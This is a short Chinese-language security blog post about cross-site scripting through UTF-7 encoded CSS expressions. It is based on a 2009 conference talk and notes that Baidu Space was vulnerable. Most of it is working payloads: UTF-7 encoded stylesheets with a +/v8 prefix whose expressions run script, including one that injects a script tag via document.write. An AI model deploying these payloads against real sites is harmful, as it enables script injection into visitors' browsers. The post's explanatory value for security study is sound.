【XSS】CSS expressions with UTF-7编码

utf-7 编码跨站工具，utf-7 编码 解码工具下载：https://lcx.cc/post/1199/

utf-7 编码跨站漏洞，是09年某黑客大会提出来的（XSS Lightsaber techniques using Hackvertor，CONFidence2009_gareth_heyes.pdf），不过国内一直无人研究。

百度空间存在该漏洞很久了，目前才修复（不知道那个蛋疼的提交到乌云了）。

XSS Lightsaber techniques using Hackvertor，CONFidence2009_gareth_heyes.pdf，该书下载地址：XSS Lightsaber techniques using Hackvertor，CONFidence2009_gareth_heyes.pdf

CSS expressions with UTF-7

• UTF-7 BOM character can force UTF-7 in a external style sheet
• Would you let me upload a style sheet?
• @charset ?UTF-7?; works
• But you don?t need it
• +/v8 is all you need

----------------------------------------------

CSS expressions with UTF-7

• UTF-7 BOM 字符可以强制在一个外部样式表(css)中使用 UTF-7 编码
• 你会让我上传一个样式表？
• @charset ?UTF-7?; works
• 但是你不需要它！
• +/v8 是你需要的

----------------------------------------------

注意：“+/v8”必须放在文件开头！

----------------------------------------------

原版 Exp：

+/v8

body {
    font-family:'+AHgAJwA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoAGEAbABlAHIAdAAoADEAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAJw-';
}
//x';xss:expression(alert(1));font-family:'

改良 Exp：

+/v8

body {
    font-family:"+AHgAIgA7AHgAcwBzADoAZQB4AHAAcgBlAHMAcwBpAG8AbgAoACgAdwBpAG4AZABvAHcALgB4AG8AeAA9AD0AMQApAD8AJwAnADoAZQB2AGEAbAAoACIAeABvAHgAPQAxADsAZQB2AGEAbAAoAGEAbABlAHIAdAAoAC8AWABTAFMAIQAvACkAKQA7ACIAKQApADsAZgBvAG4AdAAtAGYAYQBtAGkAbAB5ADoAI-";
}
//x";xss:expression((window.xox==1)?'':eval("xox=1;eval(alert(/XSS!/));"));font-family:"
//x";xss:expression((window.xox==1)?'':eval("xox=1;document.write('<script src=js.js></script>');"));font-family:"